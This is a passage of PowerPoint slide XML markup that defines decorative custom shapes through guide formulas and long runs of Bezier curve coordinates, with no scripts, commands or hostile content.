              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF940197-18E6-4C04-8B36-34A79B8755E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr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24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D56BD4-8D6F-4FD6-8011-C645F2C8D445}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr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54F77CF0-1458-4140-9E61-44D7565420D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr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94F5964F-1AF9-4361-AF40-A99A57E074E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20353C5A-4588-40B0-AD2F-12E283A09BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC39E1E7-6B77-4D48-B3EA-2454E52CE088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr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2017/12/3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09FD6D3-F58D-4502-91D9-C9DE4D6CDBE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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFDF74EB-32AA-439C-9999-86819FE47842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="630692" y="1649412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3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3" y="609"/>
                  <a:pt x="163" y="609"/>
                  <a:pt x="163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C76BA4D0-28E0-4AC8-A86C-658BF159CC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760738" y="2124075"/>
            <a:ext cx="8670524" cy="285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21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C4363A1-C1FE-40B7-BD43-45B6CBBBE595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1997982" y="1797050"/>
            <a:ext cx="654050" cy="654050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 328 w 335"/>
              <a:gd name="T1" fmla="*/ 56 h 335"/>
              <a:gd name="T2" fmla="*/ 299 w 335"/>
              <a:gd name="T3" fmla="*/ 57 h 335"/>
              <a:gd name="T4" fmla="*/ 274 w 335"/>
              <a:gd name="T5" fmla="*/ 57 h 335"/>
              <a:gd name="T6" fmla="*/ 274 w 335"/>
              <a:gd name="T7" fmla="*/ 82 h 335"/>
              <a:gd name="T8" fmla="*/ 273 w 335"/>
              <a:gd name="T9" fmla="*/ 110 h 335"/>
              <a:gd name="T10" fmla="*/ 245 w 335"/>
              <a:gd name="T11" fmla="*/ 111 h 335"/>
              <a:gd name="T12" fmla="*/ 220 w 335"/>
              <a:gd name="T13" fmla="*/ 111 h 335"/>
              <a:gd name="T14" fmla="*/ 220 w 335"/>
              <a:gd name="T15" fmla="*/ 136 h 335"/>
              <a:gd name="T16" fmla="*/ 219 w 335"/>
              <a:gd name="T17" fmla="*/ 165 h 335"/>
              <a:gd name="T18" fmla="*/ 190 w 335"/>
              <a:gd name="T19" fmla="*/ 166 h 335"/>
              <a:gd name="T20" fmla="*/ 166 w 335"/>
              <a:gd name="T21" fmla="*/ 166 h 335"/>
              <a:gd name="T22" fmla="*/ 166 w 335"/>
              <a:gd name="T23" fmla="*/ 190 h 335"/>
              <a:gd name="T24" fmla="*/ 165 w 335"/>
              <a:gd name="T25" fmla="*/ 219 h 335"/>
              <a:gd name="T26" fmla="*/ 136 w 335"/>
              <a:gd name="T27" fmla="*/ 220 h 335"/>
              <a:gd name="T28" fmla="*/ 111 w 335"/>
              <a:gd name="T29" fmla="*/ 220 h 335"/>
              <a:gd name="T30" fmla="*/ 111 w 335"/>
              <a:gd name="T31" fmla="*/ 245 h 335"/>
              <a:gd name="T32" fmla="*/ 110 w 335"/>
              <a:gd name="T33" fmla="*/ 273 h 335"/>
              <a:gd name="T34" fmla="*/ 82 w 335"/>
              <a:gd name="T35" fmla="*/ 274 h 335"/>
              <a:gd name="T36" fmla="*/ 57 w 335"/>
              <a:gd name="T37" fmla="*/ 274 h 335"/>
              <a:gd name="T38" fmla="*/ 57 w 335"/>
              <a:gd name="T39" fmla="*/ 299 h 335"/>
              <a:gd name="T40" fmla="*/ 56 w 335"/>
              <a:gd name="T41" fmla="*/ 328 h 335"/>
              <a:gd name="T42" fmla="*/ 27 w 335"/>
              <a:gd name="T43" fmla="*/ 329 h 335"/>
              <a:gd name="T44" fmla="*/ 3 w 335"/>
              <a:gd name="T45" fmla="*/ 329 h 335"/>
              <a:gd name="T46" fmla="*/ 0 w 335"/>
              <a:gd name="T47" fmla="*/ 326 h 335"/>
              <a:gd name="T48" fmla="*/ 28 w 335"/>
              <a:gd name="T49" fmla="*/ 325 h 335"/>
              <a:gd name="T50" fmla="*/ 53 w 335"/>
              <a:gd name="T51" fmla="*/ 325 h 335"/>
              <a:gd name="T52" fmla="*/ 53 w 335"/>
              <a:gd name="T53" fmla="*/ 300 h 335"/>
              <a:gd name="T54" fmla="*/ 54 w 335"/>
              <a:gd name="T55" fmla="*/ 272 h 335"/>
              <a:gd name="T56" fmla="*/ 83 w 335"/>
              <a:gd name="T57" fmla="*/ 271 h 335"/>
              <a:gd name="T58" fmla="*/ 107 w 335"/>
              <a:gd name="T59" fmla="*/ 271 h 335"/>
              <a:gd name="T60" fmla="*/ 108 w 335"/>
              <a:gd name="T61" fmla="*/ 246 h 335"/>
              <a:gd name="T62" fmla="*/ 109 w 335"/>
              <a:gd name="T63" fmla="*/ 217 h 335"/>
              <a:gd name="T64" fmla="*/ 137 w 335"/>
              <a:gd name="T65" fmla="*/ 216 h 335"/>
              <a:gd name="T66" fmla="*/ 162 w 335"/>
              <a:gd name="T67" fmla="*/ 216 h 335"/>
              <a:gd name="T68" fmla="*/ 162 w 335"/>
              <a:gd name="T69" fmla="*/ 192 h 335"/>
              <a:gd name="T70" fmla="*/ 163 w 335"/>
              <a:gd name="T71" fmla="*/ 163 h 335"/>
              <a:gd name="T72" fmla="*/ 192 w 335"/>
              <a:gd name="T73" fmla="*/ 162 h 335"/>
              <a:gd name="T74" fmla="*/ 216 w 335"/>
              <a:gd name="T75" fmla="*/ 162 h 335"/>
              <a:gd name="T76" fmla="*/ 216 w 335"/>
              <a:gd name="T77" fmla="*/ 137 h 335"/>
              <a:gd name="T78" fmla="*/ 217 w 335"/>
              <a:gd name="T79" fmla="*/ 109 h 335"/>
              <a:gd name="T80" fmla="*/ 246 w 335"/>
              <a:gd name="T81" fmla="*/ 107 h 335"/>
              <a:gd name="T82" fmla="*/ 271 w 335"/>
              <a:gd name="T83" fmla="*/ 107 h 335"/>
              <a:gd name="T84" fmla="*/ 271 w 335"/>
              <a:gd name="T85" fmla="*/ 83 h 335"/>
              <a:gd name="T86" fmla="*/ 272 w 335"/>
              <a:gd name="T87" fmla="*/ 54 h 335"/>
              <a:gd name="T88" fmla="*/ 300 w 335"/>
              <a:gd name="T89" fmla="*/ 53 h 335"/>
              <a:gd name="T90" fmla="*/ 325 w 335"/>
              <a:gd name="T91" fmla="*/ 53 h 335"/>
              <a:gd name="T92" fmla="*/ 325 w 335"/>
              <a:gd name="T93" fmla="*/ 28 h 335"/>
              <a:gd name="T94" fmla="*/ 326 w 335"/>
              <a:gd name="T95" fmla="*/ 0 h 335"/>
              <a:gd name="T96" fmla="*/ 329 w 335"/>
              <a:gd name="T97" fmla="*/ 3 h 335"/>
              <a:gd name="T98" fmla="*/ 329 w 335"/>
              <a:gd name="T99" fmla="*/ 27 h 335"/>
              <a:gd name="T100" fmla="*/ 328 w 335"/>
              <a:gd name="T101" fmla="*/ 56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5" h="335">
                <a:moveTo>
                  <a:pt x="328" y="56"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="320" y="63"/>
                  <a:pt x="309" y="60"/>
                  <a:pt x="299" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="290" y="54"/>
                  <a:pt x="280" y="51"/>
                  <a:pt x="274" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="269" y="63"/>
                  <a:pt x="271" y="72"/>
                  <a:pt x="274" y="82"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="278" y="92"/>
                  <a:pt x="281" y="103"/>
                  <a:pt x="273" y="110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="118"/>
                  <a:pt x="255" y="114"/>
                  <a:pt x="245" y="111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="235" y="108"/>
                  <a:pt x="226" y="105"/>
                  <a:pt x="220" y="111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214" y="117"/>
                  <a:pt x="217" y="126"/>
                  <a:pt x="220" y="136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="223" y="146"/>
                  <a:pt x="227" y="157"/>
                  <a:pt x="219" y="165"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="211" y="172"/>
                  <a:pt x="201" y="169"/>
                  <a:pt x="190" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="181" y="163"/>
                  <a:pt x="172" y="160"/>
                  <a:pt x="166" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="172"/>
                  <a:pt x="163" y="181"/>
                  <a:pt x="166" y="190"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="201"/>
                  <a:pt x="172" y="211"/>
                  <a:pt x="165" y="219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157" y="227"/>
                  <a:pt x="146" y="223"/>
                  <a:pt x="136" y="220"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="217"/>
                  <a:pt x="117" y="214"/>
                  <a:pt x="111" y="220"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="226"/>
                  <a:pt x="108" y="235"/>
                  <a:pt x="111" y="245"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="255"/>
                  <a:pt x="118" y="266"/>
                  <a:pt x="110" y="273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103" y="281"/>
                  <a:pt x="92" y="278"/>
                  <a:pt x="82" y="274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="271"/>
                  <a:pt x="63" y="268"/>
                  <a:pt x="57" y="274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="280"/>
                  <a:pt x="54" y="289"/>
                  <a:pt x="57" y="299"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="309"/>
                  <a:pt x="64" y="320"/>
                  <a:pt x="56" y="328"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="335"/>
                  <a:pt x="38" y="332"/>
                  <a:pt x="27" y="329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="326"/>
                  <a:pt x="9" y="323"/>
                  <a:pt x="3" y="329"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="326"/>
                  <a:pt x="0" y="326"/>
                  <a:pt x="0" y="326"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="318"/>
                  <a:pt x="18" y="322"/>
                  <a:pt x="28" y="325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="328"/>
                  <a:pt x="47" y="331"/>
                  <a:pt x="53" y="325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="319"/>
                  <a:pt x="56" y="310"/>
                  <a:pt x="53" y="300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="290"/>
                  <a:pt x="47" y="279"/>
                  <a:pt x="54" y="272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="264"/>
                  <a:pt x="73" y="267"/>
                  <a:pt x="83" y="271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="274"/>
                  <a:pt x="101" y="276"/>
                  <a:pt x="107" y="271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="265"/>
                  <a:pt x="111" y="255"/>
                  <a:pt x="108" y="246"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="236"/>
                  <a:pt x="101" y="225"/>
                  <a:pt x="109" y="217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="210"/>
                  <a:pt x="127" y="213"/>
                  <a:pt x="137" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="147" y="219"/>
                  <a:pt x="156" y="222"/>
                  <a:pt x="162" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="210"/>
                  <a:pt x="165" y="201"/>
                  <a:pt x="162" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159" y="181"/>
                  <a:pt x="155" y="171"/>
                  <a:pt x="163" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="171" y="155"/>
                  <a:pt x="181" y="159"/>
                  <a:pt x="192" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="201" y="165"/>
                  <a:pt x="210" y="168"/>
                  <a:pt x="216" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="222" y="156"/>
                  <a:pt x="219" y="147"/>
                  <a:pt x="216" y="137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="127"/>
                  <a:pt x="210" y="116"/>
                  <a:pt x="217" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="225" y="101"/>
                  <a:pt x="236" y="104"/>
                  <a:pt x="246" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="110"/>
                  <a:pt x="265" y="113"/>
                  <a:pt x="271" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="277" y="101"/>
                  <a:pt x="274" y="92"/>
                  <a:pt x="271" y="83"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="267" y="72"/>
                  <a:pt x="264" y="62"/>
                  <a:pt x="272" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="279" y="47"/>
                  <a:pt x="290" y="50"/>
                  <a:pt x="300" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="56"/>
                  <a:pt x="319" y="59"/>
                  <a:pt x="325" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="331" y="47"/>
                  <a:pt x="328" y="38"/>
                  <a:pt x="325" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="322" y="18"/>
                  <a:pt x="318" y="7"/>
                  <a:pt x="326" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="329" y="3"/>
                  <a:pt x="329" y="3"/>
                  <a:pt x="329" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="323" y="9"/>
                  <a:pt x="326" y="18"/>
                  <a:pt x="329" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="332" y="38"/>
                  <a:pt x="335" y="48"/>
                  <a:pt x="328" y="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86B181C0-4937-4DB9-8B38-67E2C309E548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9072562" y="5445579"/>
            <a:ext cx="657225" cy="654050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 8 w 336"/>
              <a:gd name="T1" fmla="*/ 279 h 335"/>
              <a:gd name="T2" fmla="*/ 37 w 336"/>
              <a:gd name="T3" fmla="*/ 278 h 335"/>
              <a:gd name="T4" fmla="*/ 61 w 336"/>
              <a:gd name="T5" fmla="*/ 278 h 335"/>
              <a:gd name="T6" fmla="*/ 61 w 336"/>
              <a:gd name="T7" fmla="*/ 253 h 335"/>
              <a:gd name="T8" fmla="*/ 63 w 336"/>
              <a:gd name="T9" fmla="*/ 225 h 335"/>
              <a:gd name="T10" fmla="*/ 91 w 336"/>
              <a:gd name="T11" fmla="*/ 224 h 335"/>
              <a:gd name="T12" fmla="*/ 116 w 336"/>
              <a:gd name="T13" fmla="*/ 224 h 335"/>
              <a:gd name="T14" fmla="*/ 116 w 336"/>
              <a:gd name="T15" fmla="*/ 199 h 335"/>
              <a:gd name="T16" fmla="*/ 117 w 336"/>
              <a:gd name="T17" fmla="*/ 170 h 335"/>
              <a:gd name="T18" fmla="*/ 146 w 336"/>
              <a:gd name="T19" fmla="*/ 169 h 335"/>
              <a:gd name="T20" fmla="*/ 170 w 336"/>
              <a:gd name="T21" fmla="*/ 169 h 335"/>
              <a:gd name="T22" fmla="*/ 170 w 336"/>
              <a:gd name="T23" fmla="*/ 145 h 335"/>
              <a:gd name="T24" fmla="*/ 171 w 336"/>
              <a:gd name="T25" fmla="*/ 116 h 335"/>
              <a:gd name="T26" fmla="*/ 200 w 336"/>
              <a:gd name="T27" fmla="*/ 115 h 335"/>
              <a:gd name="T28" fmla="*/ 225 w 336"/>
              <a:gd name="T29" fmla="*/ 115 h 335"/>
              <a:gd name="T30" fmla="*/ 225 w 336"/>
              <a:gd name="T31" fmla="*/ 90 h 335"/>
              <a:gd name="T32" fmla="*/ 226 w 336"/>
              <a:gd name="T33" fmla="*/ 62 h 335"/>
              <a:gd name="T34" fmla="*/ 254 w 336"/>
              <a:gd name="T35" fmla="*/ 61 h 335"/>
              <a:gd name="T36" fmla="*/ 279 w 336"/>
              <a:gd name="T37" fmla="*/ 60 h 335"/>
              <a:gd name="T38" fmla="*/ 279 w 336"/>
              <a:gd name="T39" fmla="*/ 36 h 335"/>
              <a:gd name="T40" fmla="*/ 280 w 336"/>
              <a:gd name="T41" fmla="*/ 7 h 335"/>
              <a:gd name="T42" fmla="*/ 309 w 336"/>
              <a:gd name="T43" fmla="*/ 6 h 335"/>
              <a:gd name="T44" fmla="*/ 333 w 336"/>
              <a:gd name="T45" fmla="*/ 6 h 335"/>
              <a:gd name="T46" fmla="*/ 336 w 336"/>
              <a:gd name="T47" fmla="*/ 9 h 335"/>
              <a:gd name="T48" fmla="*/ 307 w 336"/>
              <a:gd name="T49" fmla="*/ 10 h 335"/>
              <a:gd name="T50" fmla="*/ 283 w 336"/>
              <a:gd name="T51" fmla="*/ 10 h 335"/>
              <a:gd name="T52" fmla="*/ 283 w 336"/>
              <a:gd name="T53" fmla="*/ 35 h 335"/>
              <a:gd name="T54" fmla="*/ 282 w 336"/>
              <a:gd name="T55" fmla="*/ 63 h 335"/>
              <a:gd name="T56" fmla="*/ 253 w 336"/>
              <a:gd name="T57" fmla="*/ 64 h 335"/>
              <a:gd name="T58" fmla="*/ 228 w 336"/>
              <a:gd name="T59" fmla="*/ 64 h 335"/>
              <a:gd name="T60" fmla="*/ 228 w 336"/>
              <a:gd name="T61" fmla="*/ 89 h 335"/>
              <a:gd name="T62" fmla="*/ 227 w 336"/>
              <a:gd name="T63" fmla="*/ 118 h 335"/>
              <a:gd name="T64" fmla="*/ 199 w 336"/>
              <a:gd name="T65" fmla="*/ 119 h 335"/>
              <a:gd name="T66" fmla="*/ 174 w 336"/>
              <a:gd name="T67" fmla="*/ 119 h 335"/>
              <a:gd name="T68" fmla="*/ 174 w 336"/>
              <a:gd name="T69" fmla="*/ 143 h 335"/>
              <a:gd name="T70" fmla="*/ 173 w 336"/>
              <a:gd name="T71" fmla="*/ 172 h 335"/>
              <a:gd name="T72" fmla="*/ 144 w 336"/>
              <a:gd name="T73" fmla="*/ 173 h 335"/>
              <a:gd name="T74" fmla="*/ 120 w 336"/>
              <a:gd name="T75" fmla="*/ 173 h 335"/>
              <a:gd name="T76" fmla="*/ 120 w 336"/>
              <a:gd name="T77" fmla="*/ 198 h 335"/>
              <a:gd name="T78" fmla="*/ 119 w 336"/>
              <a:gd name="T79" fmla="*/ 226 h 335"/>
              <a:gd name="T80" fmla="*/ 90 w 336"/>
              <a:gd name="T81" fmla="*/ 227 h 335"/>
              <a:gd name="T82" fmla="*/ 65 w 336"/>
              <a:gd name="T83" fmla="*/ 228 h 335"/>
              <a:gd name="T84" fmla="*/ 65 w 336"/>
              <a:gd name="T85" fmla="*/ 252 h 335"/>
              <a:gd name="T86" fmla="*/ 64 w 336"/>
              <a:gd name="T87" fmla="*/ 281 h 335"/>
              <a:gd name="T88" fmla="*/ 36 w 336"/>
              <a:gd name="T89" fmla="*/ 282 h 335"/>
              <a:gd name="T90" fmla="*/ 11 w 336"/>
              <a:gd name="T91" fmla="*/ 282 h 335"/>
              <a:gd name="T92" fmla="*/ 11 w 336"/>
              <a:gd name="T93" fmla="*/ 307 h 335"/>
              <a:gd name="T94" fmla="*/ 10 w 336"/>
              <a:gd name="T95" fmla="*/ 335 h 335"/>
              <a:gd name="T96" fmla="*/ 7 w 336"/>
              <a:gd name="T97" fmla="*/ 332 h 335"/>
              <a:gd name="T98" fmla="*/ 7 w 336"/>
              <a:gd name="T99" fmla="*/ 308 h 335"/>
              <a:gd name="T100" fmla="*/ 8 w 336"/>
              <a:gd name="T101" fmla="*/ 279 h 3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36" h="335">
                <a:moveTo>
                  <a:pt x="8" y="279"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="271"/>
                  <a:pt x="26" y="275"/>
                  <a:pt x="37" y="278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="281"/>
                  <a:pt x="55" y="284"/>
                  <a:pt x="61" y="278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="272"/>
                  <a:pt x="64" y="263"/>
                  <a:pt x="61" y="253"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="243"/>
                  <a:pt x="55" y="232"/>
                  <a:pt x="63" y="225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="217"/>
                  <a:pt x="81" y="220"/>
                  <a:pt x="91" y="224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101" y="227"/>
                  <a:pt x="110" y="230"/>
                  <a:pt x="116" y="224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="218"/>
                  <a:pt x="119" y="209"/>
                  <a:pt x="116" y="199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="189"/>
                  <a:pt x="109" y="178"/>
                  <a:pt x="117" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="163"/>
                  <a:pt x="135" y="166"/>
                  <a:pt x="146" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="155" y="172"/>
                  <a:pt x="164" y="175"/>
                  <a:pt x="170" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176" y="163"/>
                  <a:pt x="173" y="154"/>
                  <a:pt x="170" y="145"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="167" y="134"/>
                  <a:pt x="164" y="124"/>
                  <a:pt x="171" y="116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="179" y="108"/>
                  <a:pt x="190" y="112"/>
                  <a:pt x="200" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="209" y="118"/>
                  <a:pt x="219" y="121"/>
                  <a:pt x="225" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="230" y="109"/>
                  <a:pt x="228" y="100"/>
                  <a:pt x="225" y="90"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="80"/>
                  <a:pt x="218" y="69"/>
                  <a:pt x="226" y="62"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="233" y="54"/>
                  <a:pt x="244" y="57"/>
                  <a:pt x="254" y="61"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="264" y="64"/>
                  <a:pt x="273" y="66"/>
                  <a:pt x="279" y="60"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="285" y="55"/>
                  <a:pt x="282" y="45"/>
                  <a:pt x="279" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="276" y="26"/>
                  <a:pt x="272" y="15"/>
                  <a:pt x="280" y="7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="288" y="0"/>
                  <a:pt x="298" y="3"/>
                  <a:pt x="309" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="318" y="9"/>
                  <a:pt x="327" y="12"/>
                  <a:pt x="333" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="336" y="9"/>
                  <a:pt x="336" y="9"/>
                  <a:pt x="336" y="9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="17"/>
                  <a:pt x="318" y="13"/>
                  <a:pt x="307" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="298" y="7"/>
                  <a:pt x="289" y="4"/>
                  <a:pt x="283" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="277" y="16"/>
                  <a:pt x="280" y="25"/>
                  <a:pt x="283" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="286" y="45"/>
                  <a:pt x="289" y="56"/>
                  <a:pt x="282" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="274" y="71"/>
                  <a:pt x="263" y="68"/>
                  <a:pt x="253" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="243" y="61"/>
                  <a:pt x="234" y="58"/>
                  <a:pt x="228" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="222" y="70"/>
                  <a:pt x="225" y="79"/>
                  <a:pt x="228" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="99"/>
                  <a:pt x="235" y="110"/>
                  <a:pt x="227" y="118"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="125"/>
                  <a:pt x="209" y="122"/>
                  <a:pt x="199" y="119"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="189" y="116"/>
                  <a:pt x="180" y="113"/>
                  <a:pt x="174" y="119"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="125"/>
                  <a:pt x="171" y="134"/>
                  <a:pt x="174" y="143"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="154"/>
                  <a:pt x="181" y="164"/>
                  <a:pt x="173" y="172"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="165" y="180"/>
                  <a:pt x="155" y="176"/>
                  <a:pt x="144" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="135" y="170"/>
                  <a:pt x="126" y="167"/>
                  <a:pt x="120" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114" y="179"/>
                  <a:pt x="117" y="188"/>
                  <a:pt x="120" y="198"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="208"/>
                  <a:pt x="126" y="219"/>
                  <a:pt x="119" y="226"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="111" y="234"/>
                  <a:pt x="100" y="231"/>
                  <a:pt x="90" y="227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="224"/>
                  <a:pt x="71" y="222"/>
                  <a:pt x="65" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="233"/>
